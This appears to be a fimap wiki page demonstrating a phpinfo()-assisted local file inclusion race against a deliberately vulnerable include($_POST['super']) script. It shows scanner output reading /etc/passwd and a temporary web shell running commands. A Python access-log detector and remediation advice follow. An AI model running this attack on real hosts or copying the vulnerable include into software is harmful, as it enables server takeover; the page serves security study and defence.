FimapPhpInfoExploit
Oweoqi edited this page Mar 27, 2015 · 1 revision
This plugin wouldn't be possible without the hard research of Gynvael Coldwind (http://gynvael.coldwind.pl) and Insomnia Security (http://insomniasec.com), since it's based on this paper: http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf

The session below runs against this deliberately vulnerable test script (test.php), which includes whatever path the super POST parameter supplies:
<? include($_POST["super"]); ?>
imax /st0rage/dev/fimap/src $ ./fimap.py -u http://localhost/test.php -P super=sexy
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
SingleScan is testing URL: 'http://localhost/test.php'
[04:01:06] [OUT] Inspecting URL 'http://localhost/test.php'...
[04:01:06] [INFO] Fiddling around with URL...
[04:01:06] [OUT] [PHP] Possible file inclusion found! -> 'http://localhost/test.php' with POST-Parameter 'super'.
[04:01:06] [OUT] [PHP] Identifying Vulnerability 'http://localhost/test.php' with POST-Parameter 'super'...
[04:01:06] [INFO] Scriptpath received: '/var/www'
[04:01:06] [INFO] Operating System is 'Unix-Like'.
[04:01:06] [INFO] Testing file '/etc/passwd'...
[04:01:07] [INFO] Testing file '/proc/self/environ'...
[04:01:07] [INFO] Testing file 'php://input'...
[04:01:07] [INFO] Testing file '/var/log/apache2/access.log'...
[04:01:07] [INFO] Testing file '/var/log/apache/access.log'...
[04:01:07] [INFO] Testing file '/var/log/httpd/access.log'...
[04:01:07] [INFO] Testing file '/var/log/apache2/access_log'...
[04:01:07] [INFO] Testing file '/var/log/apache/access_log'...
[04:01:07] [INFO] Testing file '/var/log/httpd/access_log'...
[04:01:07] [INFO] Testing file '/var/log/auth.log'...
[04:01:07] [INFO] Testing file '/var/log/secure'...
[04:01:07] [INFO] Testing file 'http://www.phpbb.de/index.php'...
##########################################################
#[1] Possible PHP-File Inclusion #
##########################################################
#::REQUEST #
# [URL] http://localhost/test.php #
# [POST] super=sexy #
# [HEAD SENT] #
#::VULN INFO #
# [POSTPARM] super #
# [PATH] /var/www #
# [OS] Unix #
# [TYPE] Absolute Clean #
# [TRUNCATION] No Need. It's clean. #
# [READABLE FILES] #
# [0] /etc/passwd #
##########################################################
imax /st0rage/dev/fimap/src $ ./fimap.py -x
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
No exploitable domains found.
There are some domains hidden tho because they cant be exploited by fimap without help.
To show them start fimap with *uppercase* -X
imax /st0rage/dev/fimap/src $ ./fimap.py -X
fimap v.1.00_svn (Your best friend!)
:: Automatic LFI/RFI scanner and exploiter
:: by Iman Karim (fimap.dev@gmail.com)
###########################
#:: List of Domains :: #
###########################
#[1] localhost #
#[q] Quit #
###########################
Choose Domain: 1
[04:13:13] [OUT] You have selected a file which is only readable.
[04:13:13] [OUT] Lets see if one of our plugins is interested in it...
######################################################
#Fallback Plugin Selection #
######################################################
#[1] [PHPInfo] Launch Coldwind/Insomnia Glitch... #
#[q] Quit #
######################################################
Your Selection: 1
-----------------------------------------------------------------------------
This plugin wouldnt be possible without the hard research of
Gynvael Coldwind (http://gynvael.coldwind.pl)
and
Insomnia Security (http://insomniasec.com)
since its based on this paper:
http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf
-----------------------------------------------------------------------------
#########################################################
#PHPInfo Coldwind/Insomnia Glitch #
#########################################################
#1. Enter URL of PHPInfo() #
#2. AutoProbe for PHPInfo() #
# Current URL: <None - Define one!> #
#3. Change number of attempts (Current: 5000) #
#4. Change number of threads (Current: 10) #
#5. Change eggdrop location (Current: /tmp/eggdrop) #
#6. Change number of trash to append (Current: 3000) #
#7. Launch attack #
#q. Back to fimap #
#########################################################
Choose action: 1
Please type in the complete URL of the PHPInfo() file: http://localhost/info.php
PHPInfo() URL changed to: http://localhost/info.php
#########################################################
#PHPInfo Coldwind/Insomnia Glitch #
#########################################################
#1. Enter URL of PHPInfo() #
#2. AutoProbe for PHPInfo() #
# Current URL: http://localhost/info.php #
#3. Change number of attempts (Current: 5000) #
#4. Change number of threads (Current: 10) #
#5. Change eggdrop location (Current: /tmp/eggdrop) #
#6. Change number of trash to append (Current: 3000) #
#7. Launch attack #
#q. Back to fimap #
#########################################################
Choose action: 7
Checking if the URL you provided is really a PHPInfo file...
Launching attack...
Egg dropped successfully!
Waiting for remaining threads to finish...
Finished.
PHP Code Injection thru EggDrop works!
[04:13:36] [INFO] Testing execution thru 'popen[b64]'...
[04:13:36] [OUT] Execution thru 'popen[b64]' works!
--------------------------------------------------------------------
Welcome to the fimap_eggshell!
This is a lite version of the fimap shell.
Consider this shell as a temporary shell you should get rid of asap.
Upload your own shell to be on the safe side.
--------------------------------------------------------------------
fimap_eggshell> uname -a
Linux DevelB0x 3.0.0-15-generic #25-Ubuntu SMP Mon Jan 2 17:44:42 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
fimap_eggshell> cat test.php
<? include($_POST["super"]); ?>
fimap_eggshell> q
######################################################
#Fallback Plugin Selection #
######################################################
#[1] [PHPInfo] Launch Coldwind/Insomnia Glitch... #
#[q] Quit #
######################################################
Your Selection: q
imax /st0rage/dev/fimap/src $
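The attack run above fires 5000 attempts on 10 threads at the phpinfo() page, and each attempt is paired with an inclusion request against the vulnerable script. That shape lands in the web server's access log even though the POST body (and so the included path) does not. What follows is an added example, not fimap code and not part of the original page: a small Python checker that parses Apache combined-format log lines and reports any source host that bursts POSTs against two or more PHP scripts at once. The sample log lines, the 10-second window, the 50-request threshold, the host addresses and the script names are all constructed assumptions for the demonstration (the script names are borrowed from the session above).

```python
"""Spot the access-log footprint of the phpinfo()-assisted LFI race.

Added example (not fimap code). The race needs thousands of concurrent
POSTs against the phpinfo() page from one source, each one paired with an
inclusion attempt against the vulnerable script. Neither request is odd on
its own; a single host bursting POSTs at two PHP scripts at once is.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" format; we need host, timestamp, method, path and size.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Tunables; these are assumptions for the example, not fimap settings.
WINDOW = timedelta(seconds=10)   # sliding window length
MAX_POSTS = 50                   # POSTs to one script inside WINDOW before we care


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["path"] = rec["path"].split("?", 1)[0]       # drop the query string
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    return rec


def find_post_bursts(lines, window=WINDOW, max_posts=MAX_POSTS):
    """Map (host, path) -> peak number of POSTs seen inside any `window`.

    Only pairs whose peak exceeds `max_posts` are returned. Lines are
    expected in the order the server wrote them (i.e. by time)."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].endswith(".php"):
            posts[(rec["host"], rec["path"])].append(rec["ts"])
    bursts = {}
    for key, stamps in posts.items():
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:     # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak > max_posts:
            bursts[key] = peak
    return bursts


def correlate(bursts):
    """Hosts bursting against two or more scripts: the race shape, where one
    page leaks the temporary upload name and the other includes it."""
    by_host = defaultdict(dict)
    for (host, path), count in bursts.items():
        by_host[host][path] = count
    return {h: p for h, p in by_host.items() if len(p) >= 2}


def sample_log():
    """Constructed log: light background traffic plus a burst from 10.0.0.5
    against /info.php and /test.php (names taken from the session above)."""
    base = datetime(2015, 3, 27, 4, 13, 13, tzinfo=timezone.utc)

    def fmt(host, ts, method, path, size):
        return (f'{host} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" '
                f'200 {size} "-" "Mozilla/5.0"')

    lines = []
    for i in range(120):                               # 20 request pairs per second
        ts = base + timedelta(milliseconds=50 * i)
        lines.append(fmt("10.0.0.5", ts, "POST", "/info.php", 60000 + i))
        lines.append(fmt("10.0.0.5", ts, "POST", "/test.php", 512))
    for i in range(5):
        lines.append(fmt("192.0.2.10", base + timedelta(seconds=i), "GET", "/index.php", 2048))
    return lines


if __name__ == "__main__":
    hits = correlate(find_post_bursts(sample_log()))
    for host, paths in hits.items():
        print(f"{host}: POST burst against {', '.join(sorted(paths))}")
```

Run it directly to print the report for the constructed sample; on a real server, pass the lines of /var/log/apache2/access.log (or whichever log the session lists) to find_post_bursts. The check only narrows down where to look. The durable fixes are to keep phpinfo() pages off production hosts and to replace include($_POST[...]) with an allowlist of script names, since the race only exists while both the info page and the unconstrained include are reachable.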